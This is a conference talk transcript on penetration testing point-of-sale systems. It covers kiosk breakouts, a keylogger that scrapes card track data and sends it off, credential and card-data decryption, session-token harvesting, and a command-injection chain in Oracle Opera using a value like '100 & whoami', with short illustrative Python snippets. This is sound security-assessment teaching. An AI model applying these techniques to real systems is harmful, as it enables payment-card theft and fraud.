Thank you, everyone. Hey, everyone. So yeah, this is actually our first time at NorthSec, so we'd like to thank all the organizers for accommodating us and having us here, and thank all of you for coming out. My name is Jackson Thuraisamy. Pierre David already introduced me, but that's some information about me. And I'll let Jason introduce himself. Yep, my name is Jason Tran. Currently I'm an application security engineer at Twitch Interactive. I worked with Jackson at Security Compass for a little over two years, and Pierre gave a bit of my background, so we'll just continue on. There's my contact information as well, if you'd like to reach me. So some of you may have been confused about which acronym is which in our title, so we ended up leaving them both in. Welcome to our talk, Hacking Piece-of-Shit Point-of-Sale Systems. Now, I'm certain all of you have some basic knowledge of what a POS system is, but in general, it's where a sales transaction takes place. These systems can range from purely mechanical ones, like the one at my barber shop, to the computer-based ones you commonly see in today's retail stores. And today, a lot of product-based startups use modern-looking point-of-sale interfaces that don't run on specialized hardware and can run on commodity devices. The state of POS systems has been interesting over the last couple of years. Back in October 2015, there was the EMV liability shift in the US. What this means is that liability for credit card fraud and chargebacks due to the insecurity of magstripes now falls on the merchants themselves, rather than the card issuers, if the POS system doesn't support chip-and-PIN cards. And a lot of companies have been transitioning to chip card readers, especially in the States. So the point of this talk is to understand point-of-sale attacks better.
For people who are more on the offensive side, our goal is to share some interesting techniques so you can provide a bit more value in your assessments. And if you're on the defensive side, well, in order to defend, it really helps to understand what you're defending against. We'll start fairly high level, and we'll get more technical and expose some fairly serious vulnerabilities toward the end. As you can see in the list of case studies, with the exception of the Oracle application, we've censored some detailed information about the other applications. And we have a lot to cover, so we'll be going fairly quickly. So we'll start off with the standards. To preface this section a little bit, we just want to be clear that we're not QSAs; we're looking at the standards from a pentester's perspective, and this is just to lay the groundwork for the case studies that we'll bring up later. The two standards are PCI DSS and PA-DSS; they're spelled out up there. In general, PCI DSS tells merchants and service providers how to protect sensitive information, while PA-DSS tells payment application developers how to design and implement coding patterns that are compliant with PCI. So we're going to go over what they cover, the differences, and some attack vectors that aren't explicitly covered in these standards. A quick shout-out to Slava Gomzin, who wrote this Hacking Point of Sale book; if you're interested, I highly recommend picking it up. Here we have a handy chart of some of the vulnerability areas and attack vectors, which standards address them, and who's ultimately responsible for the mitigation. You can see that all of them put the onus on the merchants themselves, with a couple of them on both the vendor and the merchants.
So the key takeaway here is that some merchants, both big and small companies, may let issues that arise from pentests slip, because the assumption is that the PA vendors will take care of them. We'll move on to some attack vectors that these standards might not necessarily cover. Today we're going to focus purely on PA-DSS. The first requirement, 1.1, says do not store the full magnetic stripe, card verification code or value, or PIN block, and more specifically, do not store sensitive authentication data after authorization, even if it's encrypted. If you pay close attention, this doesn't stop you from disconnecting the system from the network and checking whether the data is stored in clear text before being transmitted. And it's important to note that this isn't really addressed in any of the other requirements, so magstripe data could be sitting in the clear on the actual POS system. Requirement 2, to elaborate, is to protect stored cardholder data and to encrypt it using secure algorithms and implementations. In the standard, it's not that obvious which strong encryption algorithms and which implementations should be used. From an attacker's perspective, it's important to investigate any interactions with the database and look for weaknesses in the connections, to see if the application is using weak encryption workflows, default passwords for its database, plaintext credentials in configuration and temp files, and so on. The third one we're going over today is requirement 5, to develop secure payment applications. In some cases, developers and operations personnel may turn a bit of a blind eye to securing the underlying systems themselves.
And thus you have a weak point outside the application, outside the scope of these standards. And for companies that do run compliance audits, the audits don't occur frequently enough for new exploits in the wild to be patched before they're actively exploited. So from the attacker's perspective, again, look for configuration flaws related to any of the newer public exploits. And then requirement 9: cardholder data must never be stored on a server connected to the internet. From an attacker's perspective, look into the internal network endpoints themselves and see if there are any interactions with externally facing components. As an example that Jackson will go into later, an application that was configured to be externally accessible could be compromised in order to access the internal database containing cardholder data. So now that we've discussed some of the standards and some of their pitfalls, let's get into physically assessing the POS. While doing a POS assessment, it's important to identify any obvious physical access points to your target. What sort of barriers does it have? Is it in a tamper-resistant podium? Can you pick up the computer itself? What I/O do you have access to? Is it locked with a key? These are just some of the things to look out for. In this first example, we encountered a pretty simple lock that covered the POS I/O ports. It was easily picked, and you could also just rip off the cover with your hands. From there, you could plug in a mouse and keyboard to interact with the system without using the touchscreen interface, which definitely made things a lot easier. And funny enough, it was called RealPOS. In this next example, we had an all-in-one computer that was deeply recessed into a podium, and after some fiddling, we could lift it out of the podium.
Again, we could easily access the I/O ports, connect a keyboard and mouse, and interact with the system a little more easily. In some of our assessments, we did see some implementations that attempted to prevent I/O access. On the left side here, you can see a tiny USB insert that blocks the port. The tool right beside it hooks into the insert, and after flipping the switch, you can pull out the tool and leave the insert inside the USB port. Now, this is pretty simple to bypass: you can just bend some paper clips into the two hooks and pull it out. So now that we've talked a bit about overcoming physical barriers, we can go over our experiences in breaking out of the actual kiosk. Quite simply, kiosk mode is a locked-down version of the system that forces you into certain tasks in the public setting where the POS is. Some restrictions include not being able to launch Task Manager, not being able to right-click and use context menus, or not being able to use removable storage. These are enforced by what are called Group Policy Objects, and can be applied to specific users, paths, programs, and so forth. In these assessments, we usually ask clients what type of GPOs are in place, as there are a lot of them. Generally, it's very rare to see a completely locked-down POS system, and there are usually many ways to break out and gain access to the system. Now, if you're doing this type of pentest for a client's environment, it's better value to find as many vectors as you can, rather than pigeonholing yourself into one. There are two really good references that we've used, called WinIntro and TrustedSec. WinIntro is great for describing all the different GPOs, and TrustedSec is good for performing POS assessments from a red team's perspective. So one case study that I want to get into involves administrative startup scripts. In this case study, privilege escalation was technically possible after breaking out of kiosk mode.
But there were a lot of things that prevented us from navigating the system with ease. For example, there was a script that would kick us back into kiosk mode after breaking out. What we found to make things easier was to eventually create a local admin user to control the machine. So how did we do this? We noticed that during the reboot process, there would be scripts running right before kiosk mode finished booting up. We messed around and tried to tamper with them a bit, and eventually, when we started pausing the scripts, one of them would halt and leave a command prompt open. Luckily, this was running as administrator. From there, we could create a local admin, navigate the system with relative ease, and disable the scripts kicking us back into kiosk mode. So one of the goals when trying to break out of kiosks is to get some sort of Explorer window or command prompt, so that from there we can try to run programs that allow some level of execution. The slide here shows the use of Sticky Keys: you just press the Shift key five times, and a window pops up, and from there you can click on a link to launch an Explorer window. As far as I know, I'm not aware of any GPO to disable this, but it is something that can be disabled through the registry. Now, once you have a window open, you can try to launch different applications. In this case, there just happened to be Microsoft Word on the system, and once I launched that, I could create a macro. In this case it's just launching PowerShell, but it could launch other applications as well. Another example is a scenario where I was working with what seemed to be a locked-down instance of Internet Explorer. I couldn't open any files; you can see on the slide that there is no File menu.
But I was eventually able to get a file open dialog box through the InPrivate Filtering section of the Manage Add-ons dialog. From there, I would try to get a context menu so I could open arbitrary programs easily. Now, one of the challenges I had was that if I tried to right-click an item, no context menu would open. But if I enabled the preview pane, selected the item, and then right-clicked the preview pane, I would get the context menu. In this case, there happened to be Notepad++ installed, and from there I could run an application. Now, in these cases, there were some applications that aren't available everywhere, like Notepad++ or Microsoft Word, so it's best to make the most of what you have in an environment. In situations where certain keyboard shortcuts were blocked, we still found that media key shortcuts were helpful. Some of these media keys had Windows Explorer launch buttons, which would ultimately lead us to some form of execution vector. And then there were situations where keyboards couldn't be plugged into the actual POS system, but it turned out that we could use the existing barcode scanners to act as keyboards. With certain models, it was actually possible to reprogram them and use a limited set of keyboard shortcuts, like Windows+R to get a Run dialog or Ctrl+O to get a file open dialog. This is part of the Advanced Data Formatting standard, and you can learn more about it in Tencent's BadBarcode article online. The barcode on the slide is actually a link to the article, so if you like, you can check it out. So now that we've talked about breaking out, many people would think the next natural step is to elevate your privileges. But in some of these assessments, we found that the POS system was already running as admin. Sometimes it wasn't, but like in the previous case study, admin privileges aren't always necessary.
But they can definitely make it easier to reliably break out, disable mitigations in place on the system, or just set up persistence. So the goal that we have when doing PCI pentests isn't necessarily to get DA. I mean, that would be cool, but we're trying to ensure that attackers can't get access to cardholder data. Even if you got DA, at some point you'd probably have to go back to the application layer to see if you can extract that sensitive data. What we found makes better use of our time in these assessments is, ideally, a scenario where you have two specialists working on two POS devices at the same time. On both systems, the POS application runs with a configuration for a test environment, so you obviously can't do real transactions with them. On the first POS, the OS is hardened, as close to production as possible; this one is for seeing whether we can break out and pivot from there. On the second POS, the OS is not hardened and isn't in a restrictive environment at all; the point of that one is to find application vulnerabilities. The first specialist works on POS number one, and would ideally be familiar with circumventing system hardening measures. The second specialist would ideally have more of an appsec or reversing background, focusing on finding bugs that could lead to cardholder data disclosure. The benefit we find with this approach is that you don't waste time breaking out before you can even begin testing the actual POS application. So next we'll go through some of the potential ways to achieve our goal of getting cardholder data, and some examples we've seen in assessments. Remember that the data has to exist somewhere in clear text, and this is often memory. PA vendors aren't held to any standards for protecting data in memory.
Ultimately, it falls under the liability of the merchants and the users of the software. Some tools to scrape memory are WinHex, which can use regexes to look for Visa, Mastercard, and Amex card numbers, and Memory Scraper, a C# utility that can attach to Windows processes. Data in transit is not a high priority for attackers, especially when TLS is being used; from an attacker's perspective, it's important to find the path of least resistance to the cardholder data. That's why data at rest is the ultimate goal, as you can find a bigger repository of credit card data all at once. So here's an example of magstripe-reader malware. This is the type of attack you see more often in the news, where attackers somehow implant malware on the system and then start collecting data from the magnetic stripes to clone cards. Now, the reason some of this is possible is that you have plug-and-play USB magnetic stripe readers with keyboard emulation mode enabled. So when you swipe the card, what's really happening is that the reader is just typing out the numbers. For a couple of my assessments, what I ended up doing was putting together a simple Python script, compiling it to an EXE, and using the Win32 API to hook keyboard events and look for character sequences associated with track 1 and track 2 data. After collecting that data, it would send it off to another host, and for persistence, it would add a startup shortcut for the logged-in user. Now, although this does the trick and is maybe good enough for a pentest, I wouldn't really call it malware, because it's really basic compared to what a real attacker would do. There are stealthier ways to persist on the system and exfiltrate the data.
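As a rough sketch of the detection half of a script like that (the Win32 keyboard hook and the exfiltration are omitted; the patterns follow the standard ISO 7813 track 1/2 layouts, and the sample buffer uses a well-known test PAN, not real data):

```python
import re

# Track 1 (IATA format): %B<PAN>^<name>^<expiry/service code/discretionary>?
# Track 2 (ABA format):  ;<PAN>=<expiry/service code/discretionary>?
TRACK1_RE = re.compile(r"%B\d{12,19}\^[^^]{2,26}\^\d{4}[^?]*\?")
TRACK2_RE = re.compile(r";\d{12,19}=\d{4}[^?]*\?")

def scrape_tracks(keystroke_buffer: str):
    """Return any track 1/2 sequences found in a buffer of captured keystrokes.

    A keyboard-emulating magstripe reader 'types' these sequences, so they
    show up verbatim in whatever a keyboard hook records."""
    return TRACK1_RE.findall(keystroke_buffer) + TRACK2_RE.findall(keystroke_buffer)

if __name__ == "__main__":
    # Simulated hook output: UI typing mixed with one card swipe (test PAN).
    buffer = ("login%B4111111111111111^DOE/JOHN^2512101000000000?"
              ";4111111111111111=25121010000000000000?cart")
    for track in scrape_tracks(buffer):
        print(track)
```

In the real script, each match would be queued for sending to another host instead of printed.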
Now, considering that several systems have their magstripe readers in keyboard emulation mode, some could be even more vulnerable, especially when they only require a card swipe to log in. We've seen a scenario where the data on the magstripe was actually just the ID number printed on the card. If you're able to plug a keyboard into the POS, you can simply type in the ID that's on the card to get access. What's potentially more troubling is that you could also just start incrementing or decrementing the ID to get access to other accounts, and if you get lucky, you can find one with more privileges than you already had. All right, before I get to the next case study, I'll quickly explain what a two-tier architecture is, for those who may not know. Applications with a two-tier architecture talk to the database directly instead of going through an intermediary application server. So when it comes to submitting payment information, the client directly inserts rows into the database. This is problematic because it becomes difficult to do integrity checks, and overall, two-tier architectures tend to be less secure than three-tier architectures, where there's an application server in the middle. In this situation, the POS system had a Windows desktop application that communicated directly with a SQL Server database. The production environment was just using a default corporate image that wasn't locked down to kiosk mode. It was also difficult to lock it down to kiosk mode for everyone, because sometimes people in finance would use the application, and they can't run it in full kiosk mode and still get the data they need. So the idea is that if a maliciously motivated insider can exfiltrate the application's binaries, they can do a lot of the analysis work needed to compromise the application offline.
And this is pretty attractive, because the goal is to get access to all the cardholder data in the database instead of stealing one card at a time, like in the previous example. When I was looking at this, something really interesting to me was that the database connection information was stored in an INI settings file. As you can see, the username and password seem to be encrypted, and ideally, to decrypt them, you would need the ciphertext that you're seeing, the encryption key, and information about the algorithm being used. To edit the file, they had a separate database INI editor application, where administrators could input the connection information to update that INI file. What struck me about this is that although the credentials appeared to be symmetrically encrypted, there didn't seem to be any evidence of some sort of shared key file visible to the user. So using a disassembler and debugger, I tried to dig deeper, and I determined that the encryption key was actually just stored in the binary. Now that I had the encryption key, I also needed to know the details of the algorithm being used. But since I only had a day and a half for this assessment, I needed a faster way to get the credentials. When I put the binary through the disassembler, I was lucky enough that the function names hadn't been stripped out, and there was one called EncryptString. So I looked for that in the debugger, and you can see what it looks like when it's about to encrypt the username and password. Through static analysis, it turned out that the application also had a DecryptString method with the same function signature that just wasn't called by the UI. So by patching the binary to call DecryptString instead of EncryptString, I could decrypt the credentials. Some of you might see where this is going.
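To illustrate why that patch works, here's a toy sketch in Python. This is not the vendor's actual cipher: the XOR scheme, the embedded key, and the credential string are all made up. The point is only that when encrypt and decrypt share a key baked into the binary and the same function signature, swapping one call site for the other hands you the plaintext.

```python
import base64

EMBEDDED_KEY = b"s3cr3t-key"  # hypothetical key recovered from the binary

def encrypt_string(plaintext: str, key: bytes = EMBEDDED_KEY) -> str:
    # Toy XOR cipher standing in for whatever symmetric scheme the app used.
    ct = bytes(b ^ key[i % len(key)] for i, b in enumerate(plaintext.encode()))
    return base64.b64encode(ct).decode()

def decrypt_string(ciphertext: str, key: bytes = EMBEDDED_KEY) -> str:
    # Same signature as encrypt_string: exactly why patching the INI editor's
    # call from EncryptString to DecryptString worked without further reversing.
    ct = base64.b64decode(ciphertext)
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(ct)).decode()

if __name__ == "__main__":
    blob = encrypt_string("sa:SuperSecret1!")  # what sits in the INI file
    print(blob, "->", decrypt_string(blob))    # what the patched editor reveals
```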
Basically, with the patched version, I take these credentials, copy them, and paste them into the patched editor, and when I click the Process button, it updates the file and I get my database credentials. Once I got access to the database, I found the tables where the cardholder information is stored, and as I expected, the individual credit card numbers were stored encrypted. But because decryption is done on the client side, you would just need to analyze the POS software further to figure out how to decrypt them. I didn't get that far because of time restrictions, but in a more realistic scenario, that's something that should be feasible. And beyond credit card information, once you have access to a database like that, there's a lot more you can look into or start tampering with. One is stealing login IDs, especially in a scenario where the POS system only takes a card swipe to log in, so you never type a password; ideally, you can start finding the different login IDs that way. Or there may be an initial user, like user number 1 or 0, with some sort of superuser ID that works on any instance of the application. And sometimes, for performance reasons, certain tables, like the one for item prices, are cached; they're periodically updated, but when the application queries that information, it queries it locally. So it could be possible to just update those prices and have no validation checks when the transaction occurs. So those are the vulnerabilities for that one. Next I'll talk about the Oracle Opera application. I'm not sure if many of you have heard of this, but it's basically a property management system that's used at a lot of major and boutique hotels. It's the software that staff use behind the counter, and it allows them to manage reservations and process payments.
I'll talk about three approaches an attacker can take to gain access to the cardholder data in the database. One of them is through a privilege escalation on the application itself; another is where the database connection string is exposed; and lastly, there was a way to get remote code execution as SYSTEM. One thing I want to mention is that all of these techniques were discovered in ways that would be almost impossible in an unauthenticated black-box environment. But the reality is that for vendor applications, a real attacker doesn't always need to be restricted to their target environment; there are ways around it. For the first one, the vulnerability was exposed session logs. This was a page in a temporary static directory, and it had a lot of debug information and seemed to log active session tokens. When you have a list of active session tokens, it's just a matter of time before an administrator logs in. And again, this is a page that users don't come across through standard interaction. So how would a real attacker find these URLs if they're not exposed? Well, one way, if they're really well resourced, is to just run their own instance of the server software and find out how it works from there. Another is that they could find a vulnerable instance of Opera on a vulnerable server; maybe there's some misconfiguration that gives them access to that server. They may not be going after that one in particular, but the point is to develop capabilities that can be used against their actual targets. And another is to somehow gain access to the binaries themselves and do some static analysis to see where files like those are being written. When you compare this with in-house software, that's usually not possible, because you don't have scenarios like this.
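As a rough sketch of what harvesting those exposed session logs might look like (the log format, usernames, and token values here are hypothetical; the real debug page looked different):

```python
import re

# Hypothetical shape of the exposed debug log found in the static directory.
LOG = """\
2018-05-17 10:01:22 DEBUG session created user=frontdesk01 token=6f1d2c3b4a59687706
2018-05-17 10:03:41 DEBUG session created user=admin token=9e8d7c6b5a4312fedc
"""

TOKEN_RE = re.compile(r"user=(\S+) token=([0-9a-f]+)")

def harvest_tokens(log_text: str) -> dict:
    """Map usernames to their active session tokens found in the log.

    An attacker polling this page simply waits until a token for a
    privileged user, like an administrator, shows up."""
    return dict(TOKEN_RE.findall(log_text))

if __name__ == "__main__":
    print(harvest_tokens(LOG).get("admin"))
```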
Once you have the token of an administrator user, you can start to impersonate them. And once you're in the application, you can launch what's called the Opera SQL tool to interact with the database. You can see here that I've queried credit card information, but it's stored encrypted. The caveat with this approach is that every query is logged at the application layer, so it's not that stealthy, and it's also really slow to use this interface compared to direct access to the database. The way to get that was through accessing certain pages. The responses of these pages show things that you can start piecing together to get the connection string at the bottom. Once you have that, assuming you're on the same network as the database server, which is not always possible, you can get access to the database that way. And of course, once you're in the database, it's not just cardholder data you can access; you can start tampering with reservations, or maybe upgrade someone's room, potentially. And then the third one is the remote code execution vector. What can an attacker do if they find an application server that's exposed on the internet, but the database server is not? That's where this vector comes in, and I think it's probably my favorite finding among the three, because it takes a bunch of seemingly unrelated functionality and chains it together toward a malicious purpose. The first piece is a diagnostic process information servlet that returns some information once you give it a PID, a process ID. What may not be obvious to the black-box tester is that the PID flows into a concatenated string for command execution. So an attacker can modify the value of the PID parameter like shown below.
What this does is output the standard output of the whoami command into a directory that would be accessible from the URL at the bottom. So let's see what happens when this is attempted. When you go through the first URL with the malicious payload, you just get an error, some sort of exception. It seemed like it would have worked, but instead I just got an error message saying that some sort of file wasn't found. When we look at the corresponding code for that servlet, we can see two things. The green part is what would execute the command that I supply, but the red part, because it's part of the same function, needs to succeed before we get to the green part. The problem is that a certain file doesn't exist at the location where it's looking. So there are a couple of things that need to be done: first, we need to find the value of the OPERA home property, and then we save a file to the location where it's expected to be found. Coincidentally, there happened to be another servlet that just gave me the value of the OPERA home property. And then there was yet another servlet that allowed me to put that in a file and upload it wherever I wanted on the system; it's basically a remote file inclusion vector. So now that I've patched, or fixed, the system in a way, I can try this again, and eventually I can go to the link at the bottom and hopefully get the output. When I try the first link again with my malicious payload, I get a different error, saying there's no process with PID "100 & whoami" and so on. Obviously that's a legitimate error, since an invalid PID was provided; our payload wasn't just a process ID. But when we go to that link, the test.txt file, we can see the output of the command.
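The servlet itself was Java, but the vulnerable pattern can be sketched in a few lines of Python. Everything here is a stand-in: process_info and the echo command are hypothetical, and the payload just mirrors the shape of the "100 & whoami > …" trick above with a harmless echo.

```python
import subprocess

def process_info(pid: str) -> str:
    # Vulnerable pattern: the user-supplied PID is concatenated straight
    # into a shell command string, just like the servlet did.
    cmd = "echo looking up pid " + pid
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

if __name__ == "__main__":
    # A benign stand-in for the real payload "100 & whoami > /path/test.txt":
    # the shell metacharacter terminates the intended command and runs ours.
    print(process_info("100 & echo INJECTED"))
```

The fix, of course, is to validate the PID as an integer and pass arguments as a list rather than building a shell string.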
So if you think about this, sure, from here you can run SQL*Plus or some sort of client and connect to the database. But if this is exposed externally, you've now found an initial entry point into a corporate network by exploiting third-party vendor code that isn't easy for administrators within the company to audit themselves. You can also put this together in a script just to make it easier. The next part is, once you get into the database, how do you start getting the cardholder data? Before I continue, I'll give a quick tip. It's probably obvious to some of you, but when you're starting an assessment, it's always fun to dive in, do whatever you want, and see how far you can quickly get. But it also helps to take a step back and do your recon. Reading documentation is boring, it's not always fun, but it's part of what we do, and it can get you far and save you time testing hypotheses that are ultimately useless. Especially if you had access to the code, you could see that certain payloads you're trying just won't work. By reading some of the documentation, I immediately understood how the application was performing encryption and how it was storing keys. I learned that Triple DES was being used, and not only were the keys stored in the database, the code for encryption and decryption was stored in the database as well. By running the query on the slide, I could find the obfuscated code in the package body where the keys are stored. And anything that can be obfuscated can always be de-obfuscated; that's what this PL/SQL unwrapper script above does. You can see that we found the encryption keys, and then the next step was to build some sort of script to handle the decryption for me, and that's what I did at the bottom. So at the top, you can see a row returned.
It has the encrypted value, and then using the script below, I can start to decrypt the credit card number. So that was Oracle Opera, and I'll move on to the next case study. This was an application intended for sales associates who roam around a store, allowing customers to purchase items on the spot without having to wait in line. It consisted of the company's store application plus a third-party payments application that connects to a wireless chip-and-PIN device. Since this is something customers normally wouldn't interact with themselves, I started looking into some of the more malicious things a sales associate could do. I really wanted to know how the store application communicated with the payments application. And even though it was an iOS application, it turned out to be an Appcelerator Titanium application, which is kind of a write-once-run-anywhere platform that lets developers make iOS and Android applications written in JavaScript. The thing is, when the app is built, the contents of those JavaScript files are encrypted, so I couldn't just do a string search to find what I wanted and start looking at the source around it. I think there was another talk some time ago on how the encryption worked on Android, but not a lot of details for the iOS counterpart. So for me, this was a pretty good excuse to start learning how to use Frida. For those who don't know what that is, it's a tool that allows you to inject code and hook into functions of black-box processes. I ended up writing a small tool to help me with the decryption that should hopefully also work on other applications built with Titanium. Here it is; it's pretty simple to use, assuming you have a jailbroken iOS device with Frida installed. The QR code on the right is a link to the repo. Basically, using Frida, it searches the application's memory for JavaScript file paths.
Then it invokes Titanium's own decryption routine to turn the ciphertext into plaintext files. Once I got some of the code back, I started tracing the data flow for the amount value of a transaction, and I came across an interesting function that looked like this. By the looks of it, the way the store application communicated with the payments application was through something like this, with a custom URI scheme. What stood out to me was that these requests were authenticated with a token that just happened to be hardcoded. And then there was a mode of operation, and it didn't take me too long to figure out that you can change the value there to switch it from payments mode to refund mode. So the next thing I did was make a simple webpage as a proof of concept. In terms of demonstrating the vulnerability, this page just lets you set the mode and the amount, and then it calls the payment application using that custom URI scheme. I think the most difficult part of this was getting the CSS right so I could vertically center it. But yeah, the idea is that a malicious attacker could secretly browse to a page that launches the payment application in refund mode and lets them refund some arbitrary amount they specify. So let's close out with some key takeaways and the question period. First point: attack vectors are not always explicitly covered in PCI DSS and PA-DSS. The standards aren't the end-all solution, and there are always areas left vulnerable. Circumvent physical barriers to make testing easier: if there's a way to avoid the kiosk's intended interaction methods, such as touch screens, and use peripherals such as keyboards and mice, take it, because the path of least resistance is always easier. Kiosk breakout techniques can be limited to specific environments.
Basically, this just means there's no one size that fits all. The things you've seen today may not apply to all environments, and to be successful, you really need to understand the conditions of the environment for these techniques to work. Understanding the interactions between the OS and the involved applications is pretty important. As for privilege escalation, getting administrative OS privileges is often not necessary to steal the data. The goal of these assessments is to go after PCI data, not necessarily to get DA. Even if you manage to get DA, there likely won't be some share that has all the cardholder data in plain text, so you still need to go back to the application layer to exfiltrate that data. And another takeaway: many of the applications we assessed were PA-DSS certified, and yet there were still vulnerabilities. Putting applications like these, whether they're PA-DSS certified or just vendor applications, on a corporate network makes them pretty attractive to attackers, because they have a lot more to work with to develop exploitation capabilities and research vulnerabilities. So that concludes our talk. Thanks to everyone for attending.